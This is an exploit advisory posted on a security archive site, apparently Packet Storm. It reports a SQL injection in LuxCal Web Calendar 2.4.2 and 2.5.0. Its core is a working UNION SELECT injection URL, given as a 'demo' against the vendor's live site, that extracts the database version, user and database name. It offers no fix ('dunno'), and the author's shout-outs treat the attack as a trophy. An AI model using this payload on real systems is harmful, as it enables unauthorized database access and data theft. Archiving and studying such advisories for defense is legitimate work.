what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

LuxCal Web Calendar 2.4.2 / 2.5.0 SQL Injection

LuxCal Web Calendar 2.4.2 / 2.5.0 SQL Injection
Posted Jul 7, 2011
Authored by kaMtiEz | Site indonesiancoder.com

LuxCal Web Calendar versions 2.4.2 and 2.5.0 suffer from a remote SQL injection vulnerability.

tags | exploit, remote, web, sql injection
SHA-256 | c531b5544e399b0b05f621a353b38e58960f2676c6b38c34ef113df210155c31
Download | Favorite | View

LuxCal Web Calendar 2.4.2 / 2.5.0 SQL Injection

Change Mirror Download
#############################################################################################################
## LuxCal Web Calendar v2.4.2 / v2.5.0 SQL Injection Vulnerability                         ##
## Author : kaMtiEz (kamtiez@exploit-id.com)                   ##
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id     ##
## Date : 6 July, 2011                                                        ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.luxsoft.eu
[+] Download : http://www.luxsoft.eu/index.php?pge=dload
[+] version : 2.4.2 - 2.5.0 or lower maybe also affected
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/index.php?xP=11&id=[num]

[ XpL ]

http://127.0.0.1/[kaMtiEz]/index.php?xP=11&id=[num]

[ DEMO ]

http://www.luxsoft.eu/luxcal/index.php?xP=11&id=-326415+union+all+select+1,2,@@version,user(),5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--


[ FIX ]

dunno :">


#############################################################################################################

[ Thx TO ]

[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,Z190T
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D

[ NOTE ] 

[+] Stop Dreaming , Lets Do it ! 
[+] Jangan Takut , Luka Pasti Akan Sembuh :)

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close